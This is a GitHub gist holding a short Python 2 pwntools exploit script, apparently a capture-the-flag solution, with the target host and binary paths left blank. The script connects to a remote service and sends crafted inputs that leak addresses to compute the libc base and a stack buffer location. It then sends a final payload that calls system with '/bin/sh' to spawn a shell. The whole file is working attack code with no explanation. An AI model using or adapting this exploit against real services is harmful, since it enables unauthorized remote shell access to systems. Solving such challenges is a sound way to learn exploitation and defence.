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Created January 11, 2016 11:40
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  • Save hanhanW/6de161084c14d08886ea to your computer and use it in GitHub Desktop.
Save hanhanW/6de161084c14d08886ea to your computer and use it in GitHub Desktop.
from pwn import *
#elf = ELF('/usr/lib32/')
elf = ELF('./')
t = 0
while True:
r = remote('', 55981)
print r.recvuntil(':')
r.send('\x1c' + p32(0x080487ac)[::-1] + cyclic(71))
x = r.recvrepeat(.15)
print x
print x.encode('hex')
# libc_base = int(x.encode('hex')[2:10], 16) - 0x18497
libc_base = int(x.encode('hex')[2:10], 16) - 105059
system_got = libc_base + elf.symbols['system']
gets_got = libc_base + elf.symbols['gets']
print 'libc_base : %08x' % libc_base
#print x.encode('hex')
r.send('\x9c' + p32(0x080487ac)[::-1] + cyclic(71))
x = r.recvrepeat(.15)
x = x.encode('hex')
print x
#print len(x)
# tmp = x[-12:-10] + x[-14:-12] + x[-16:-14] + x[-18:-16]
tmp = x[-4:-2] + x[-6:-4] + x[-8:-6] + x[-10:-8]
print tmp
ebp_addr = int(tmp, 16) - 0x94
buf_addr = ebp_addr - 0x48
print hex(ebp_addr), hex(buf_addr)
print hex(system_got)
s = p32(0x08048558) + p32(system_got) + p32(buf_addr+56) + p32(buf_addr+56) + '/bin/sh;/bin/sh;'
s = chr(buf_addr&0xFF) + p32(0x08048558)[::-1] + p32(buf_addr+40)[::-1] + s[::-1]
r.send(s + cyclic(76-len(s)))
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